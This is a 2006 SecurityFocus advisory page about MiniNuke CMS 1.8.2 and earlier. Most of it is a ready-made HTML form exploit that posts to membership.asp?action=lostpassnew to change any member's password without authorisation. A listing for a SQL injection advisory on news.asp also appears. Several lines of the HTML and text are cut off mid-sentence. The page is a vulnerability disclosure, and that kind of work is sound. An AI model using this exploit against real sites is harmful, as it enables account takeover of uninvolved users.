Advisory: MiniNuke CMS System <= 1.8.2 (news.asp) SQL Injectionvulnerability Jan 13 2006 04:32AM
nukedx nukedx com (1 replies)
Advisory: MiniNuke CMS System <= 1.8.2 (membership.asp) remoteuser password change exploit Jan 13 2006 04:36AM
nukedx nukedx com
--Security Report--
Advisory: MiniNuke CMS System <= 1.8.2 (membership.asp) remote user password
change exploit
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
Date: 12/01/06 08:49 PM
ICQ: 10072
MSN/Email: nukedx (at) nukedx (dot) com [email concealed]
Vendor: MiniNuke (
Version: 1.8.2 and prior versions must be affected.
About:Via this method remote attacker can change any users password without
HTML Example
<title>MiniNuke <= 1.8.2 remote user password change</title>
<form method="POST" action="http://[SITE]/membership.asp?action=lostpassnew">
<table border="0" cellspacing="1" cellpadding="0" align="center" width="75%">
<tr><td colspan="2" align="center"><font face=verdana size=2>Now fill in the
<tr><td colspan="2" align="center"><font face=tahoma size=1red>Change password
<tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD:
<td width="50%"><input type="text" name="pass" size="20"></td></tr>
<tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD Again :
<td width="50%"><input type="text" name="passa" size="20"><input type="text"
name="x" value="Membername">  
<input type="submit" value="Send" name="B1" style="font-family: Verdana;
font-size: 10px; border: 1px ridge #FFFFFF; background-color:
From the NWPX team,
nuker a.k.a nukedx

[ reply ]


Privacy Statement
Copyright 2010, SecurityFocus